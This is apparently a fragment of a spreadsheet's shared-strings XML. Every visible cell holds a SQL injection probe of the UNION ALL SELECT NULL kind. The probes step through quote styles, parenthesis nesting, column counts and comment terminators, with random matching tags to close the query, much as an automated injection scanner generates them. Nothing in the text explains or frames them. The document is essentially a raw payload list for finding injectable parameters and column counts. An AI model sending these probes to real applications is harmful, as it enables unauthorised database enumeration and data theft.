    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'LIli' LIKE 'LIli</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xlmR' LIKE 'xlmR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'msRR' LIKE 'msRR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Aajq' LIKE 'Aajq</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Fuck' LIKE 'Fuck</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vAYK' LIKE 'vAYK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</si>
  <si>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'QZOd' LIKE 'QZOd</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "SVvD" = "SVvD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qGVo" = "qGVo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "hEjQ" = "hEjQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "LEiF" = "LEiF</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "wgya" = "wgya</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "hsUM" = "hsUM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qljl" = "qljl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "lFoD" = "lFoD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "PqtL" = "PqtL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</si>
  <si>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"PHJK" = "PHJK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WMsZ" LIKE "WMsZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ffib" LIKE "ffib</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "CwIX" LIKE "CwIX</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "wKVj" LIKE "wKVj</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "lQkZ" LIKE "lQkZ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</si>
  <si>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"HFrm" LIKE "HFrm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</si>
  <si>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"CmDH" LIKE "CmDH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "cyrq" LIKE "cyrq</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ZXAM" LIKE "ZXAM</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Fkus" LIKE "Fkus</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "zRuA" LIKE "zRuA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "IxpO" LIKE "IxpO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "bFyX" LIKE "bFyX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "GUdg" LIKE "GUdg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "pmQo" LIKE "pmQo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</si>
  <si>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"hglF" LIKE "hglF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</si>
  <si>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"PtEx" LIKE "PtEx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "xmkA" LIKE "xmkA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "fDbC" LIKE "fDbC</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "vArj" LIKE "vArj</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "sGUA" LIKE "sGUA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "yNRS" LIKE "yNRS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "gtiv" LIKE "gtiv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "DsQk" LIKE "DsQk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "hfWM" LIKE "hfWM</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "fCIj" LIKE "fCIj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</si>
  <si>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"LuEP" LIKE "LuEP</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 2838 = 2838</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( 4308 = 4308</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2091 = 2091</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 8930 = 8930</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6541 = 6541</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3923 = 3923</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7450 = 7450</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  8246 = 8246</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  8880 = 8880</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  728 = 728</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7888 = 7888</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  2664 = 2664</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1859 = 1859</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5348 = 5348</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( 1322 = 1322</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6801 = 6801</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1758 = 1758</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6693 = 6693</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 403 = 403</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8557 = 8557</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 7442 = 7442</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 'zTWr' = 'zTWr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( 'pZQW' = 'pZQW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'FyaU' = 'FyaU</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ABtt' = 'ABtt</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'jrPq' = 'jrPq</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'AHep' = 'AHep</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sEbo' = 'sEbo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  'iMtH' = 'iMtH</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  'Tkcj' = 'Tkcj</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  'nsLm' = 'nsLm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'NhWG' = 'NhWG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'LSkM' = 'LSkM</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'oMRI' = 'oMRI</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vlDr' = 'vlDr</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'idfY' = 'idfY</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL-- AND   (  (   ( 'uMVf' = 'uMVf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (   ( 'TjRv' = 'TjRv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'KUsu' = 'KUsu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Kgqz' = 'Kgqz</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'yKIx' = 'yKIx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'zEzg' = 'zEzg</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'YpBC' = 'YpBC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wrni' = 'wrni</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'UtYN' = 'UtYN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'iIzn' = 'iIzn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'tOJY' = 'tOJY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'XCVS' = 'XCVS</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OcPi' = 'OcPi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xQxy' = 'xQxy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'csvE' = 'csvE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL-- AND  ( 'FbPX' LIKE 'FbPX</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL-- AND  ( 'NAFO' LIKE 'NAFO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND  ( 'klZs' LIKE 'klZs</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ywMz' LIKE 'ywMz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'qOST' LIKE 'qOST</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'SzcL' LIKE 'SzcL</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'GXEv' LIKE 'GXEv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'DzMa' LIKE 'DzMa</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL-- AND   (  (  'AqlP' LIKE 'AqlP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL-- AND   (  (  'gklI' LIKE 'gklI</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND   (  (  'zBvu' LIKE 'zBvu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'VFeq' LIKE 'VFeq</t>
  </si>
  <si>
